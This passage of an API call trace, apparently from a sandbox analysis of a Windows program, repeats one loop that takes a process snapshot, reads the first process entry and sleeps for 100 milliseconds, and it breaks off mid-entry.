[0247.415] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x564 [0247.416] Process32FirstW (in: hSnapshot=0x564, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0247.422] Sleep (dwMilliseconds=0x64) [0247.524] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x568 [0247.526] Process32FirstW (in: hSnapshot=0x568, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0247.531] Sleep (dwMilliseconds=0x64) [0247.633] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x56c [0247.635] Process32FirstW (in: hSnapshot=0x56c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0247.641] Sleep (dwMilliseconds=0x64) [0247.743] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x570 [0247.744] Process32FirstW (in: hSnapshot=0x570, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0247.750] Sleep (dwMilliseconds=0x64) [0247.852] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x574 [0247.853] Process32FirstW (in: hSnapshot=0x574, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0247.861] Sleep (dwMilliseconds=0x64) [0247.961] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x578 [0247.963] Process32FirstW (in: hSnapshot=0x578, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0247.971] Sleep (dwMilliseconds=0x64) [0248.070] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x57c [0248.072] Process32FirstW (in: hSnapshot=0x57c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0248.080] Sleep (dwMilliseconds=0x64) [0248.179] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x580 [0248.181] Process32FirstW (in: hSnapshot=0x580, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0248.187] Sleep (dwMilliseconds=0x64) [0248.289] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x584 [0248.291] Process32FirstW (in: hSnapshot=0x584, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0248.297] Sleep (dwMilliseconds=0x64) [0248.398] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x588 [0248.399] Process32FirstW (in: hSnapshot=0x588, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0248.405] Sleep (dwMilliseconds=0x64) [0248.507] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x58c [0248.509] Process32FirstW (in: hSnapshot=0x58c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0248.515] Sleep (dwMilliseconds=0x64) [0248.616] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x590 [0248.618] Process32FirstW (in: hSnapshot=0x590, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0248.624] Sleep (dwMilliseconds=0x64) [0248.725] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x594 [0248.727] Process32FirstW (in: hSnapshot=0x594, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0248.733] Sleep (dwMilliseconds=0x64) [0248.836] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x598 [0248.837] Process32FirstW (in: hSnapshot=0x598, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0248.843] Sleep (dwMilliseconds=0x64) [0248.944] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x59c [0248.945] Process32FirstW (in: hSnapshot=0x59c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0248.951] Sleep (dwMilliseconds=0x64) [0249.053] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x5a0 [0249.055] Process32FirstW (in: hSnapshot=0x5a0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0249.060] Sleep (dwMilliseconds=0x64) [0249.162] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x5a4 [0249.164] Process32FirstW (in: hSnapshot=0x5a4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0249.169] Sleep (dwMilliseconds=0x64) [0249.272] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x5a8 [0249.274] Process32FirstW (in: hSnapshot=0x5a8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0249.279] Sleep (dwMilliseconds=0x64) [0249.381] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x5ac [0249.382] Process32FirstW (in: hSnapshot=0x5ac, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0249.388] Sleep (dwMilliseconds=0x64) [0249.490] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x5b0 [0249.492] Process32FirstW (in: hSnapshot=0x5b0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0249.498] Sleep (dwMilliseconds=0x64) [0249.599] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x5b4 [0249.601] Process32FirstW (in: hSnapshot=0x5b4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0249.607] Sleep (dwMilliseconds=0x64) [0249.708] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x5b8 [0249.710] Process32FirstW (in: hSnapshot=0x5b8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0249.716] Sleep (dwMilliseconds=0x64) [0249.817] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x5bc [0249.819] Process32FirstW (in: hSnapshot=0x5bc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0249.825] Sleep (dwMilliseconds=0x64) [0249.927] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x5c0 [0249.928] Process32FirstW (in: hSnapshot=0x5c0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0249.934] Sleep (dwMilliseconds=0x64) [0250.036] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x5c4 [0250.037] Process32FirstW (in: hSnapshot=0x5c4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0250.043] Sleep (dwMilliseconds=0x64) [0250.145] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x5c8 [0250.147] Process32FirstW (in: hSnapshot=0x5c8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0250.153] Sleep (dwMilliseconds=0x64) [0250.257] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x5cc [0250.259] Process32FirstW (in: hSnapshot=0x5cc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0250.264] Sleep (dwMilliseconds=0x64) [0250.364] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x5d0 [0250.365] Process32FirstW (in: hSnapshot=0x5d0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0250.371] Sleep (dwMilliseconds=0x64) [0250.473] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x5d4 [0250.474] Process32FirstW (in: hSnapshot=0x5d4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0250.480] Sleep (dwMilliseconds=0x64) [0250.584] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x5d8 [0250.586] Process32FirstW (in: hSnapshot=0x5d8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0250.592] Sleep (dwMilliseconds=0x64) [0250.692] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x5dc [0250.695] Process32FirstW (in: hSnapshot=0x5dc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0250.701] Sleep (dwMilliseconds=0x64) [0250.800] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x5e0 [0250.802] Process32FirstW (in: hSnapshot=0x5e0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0250.808] Sleep (dwMilliseconds=0x64) [0250.910] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x5e4 [0250.911] Process32FirstW (in: hSnapshot=0x5e4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0250.917] Sleep (dwMilliseconds=0x64) [0251.019] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x5e8 [0251.020] Process32FirstW (in: hSnapshot=0x5e8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0251.028] Sleep (dwMilliseconds=0x64) [0251.128] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x5ec [0251.130] Process32FirstW (in: hSnapshot=0x5ec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0251.143] Sleep (dwMilliseconds=0x64) [0251.253] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x5f0 [0251.254] Process32FirstW (in: hSnapshot=0x5f0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0251.262] Sleep (dwMilliseconds=0x64) [0251.362] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x5f4 [0251.364] Process32FirstW (in: hSnapshot=0x5f4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0251.372] Sleep (dwMilliseconds=0x64) [0251.490] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x5f8 [0251.492] Process32FirstW (in: hSnapshot=0x5f8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0251.500] Sleep (dwMilliseconds=0x64) [0251.596] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x5fc [0251.598] Process32FirstW (in: hSnapshot=0x5fc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0251.606] Sleep (dwMilliseconds=0x64) [0251.705] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x600 [0251.707] Process32FirstW (in: hSnapshot=0x600, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0251.716] Sleep (dwMilliseconds=0x64) [0251.814] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x604 [0251.816] Process32FirstW (in: hSnapshot=0x604, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0251.822] Sleep (dwMilliseconds=0x64) [0251.923] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x608 [0251.925] Process32FirstW (in: hSnapshot=0x608, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0251.933] Sleep (dwMilliseconds=0x64) [0252.033] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x60c [0252.035] Process32FirstW (in: hSnapshot=0x60c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0252.043] Sleep (dwMilliseconds=0x64) [0252.142] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x610 [0252.144] Process32FirstW (in: hSnapshot=0x610, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0252.152] Sleep (dwMilliseconds=0x64) [0252.251] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x614 [0252.253] Process32FirstW (in: hSnapshot=0x614, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0252.261] Sleep (dwMilliseconds=0x64) [0252.361] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x618 [0252.363] Process32FirstW (in: hSnapshot=0x618, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0252.371] Sleep (dwMilliseconds=0x64) [0252.469] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x61c [0252.471] Process32FirstW (in: hSnapshot=0x61c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0252.479] Sleep (dwMilliseconds=0x64) [0252.579] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x620 [0252.580] Process32FirstW (in: hSnapshot=0x620, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0252.589] Sleep (dwMilliseconds=0x64) [0252.688] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x624 [0252.690] Process32FirstW (in: hSnapshot=0x624, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0252.698] Sleep (dwMilliseconds=0x64) [0252.797] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x628 [0252.799] Process32FirstW (in: hSnapshot=0x628, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0252.805] Sleep (dwMilliseconds=0x64) [0252.906] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x62c [0252.908] Process32FirstW (in: hSnapshot=0x62c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0252.913] Sleep (dwMilliseconds=0x64) [0253.015] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x630 [0253.017] Process32FirstW (in: hSnapshot=0x630, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0253.023] Sleep (dwMilliseconds=0x64) [0253.125] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x634 [0253.126] Process32FirstW (in: hSnapshot=0x634, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0253.132] Sleep (dwMilliseconds=0x64) [0253.234] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x638 [0253.236] Process32FirstW (in: hSnapshot=0x638, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0253.241] Sleep (dwMilliseconds=0x64) [0253.343] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x63c [0253.344] Process32FirstW (in: hSnapshot=0x63c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0253.350] Sleep (dwMilliseconds=0x64) [0253.452] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x640 [0253.454] Process32FirstW (in: hSnapshot=0x640, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0253.461] Sleep (dwMilliseconds=0x64) [0253.563] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x644 [0253.564] Process32FirstW (in: hSnapshot=0x644, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0253.570] Sleep (dwMilliseconds=0x64) [0253.671] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x648 [0253.672] Process32FirstW (in: hSnapshot=0x648, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0253.678] Sleep (dwMilliseconds=0x64) [0253.780] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x64c [0253.781] Process32FirstW (in: hSnapshot=0x64c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0253.787] Sleep (dwMilliseconds=0x64) [0253.889] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x650 [0253.891] Process32FirstW (in: hSnapshot=0x650, lppe=0x18ebc4 | 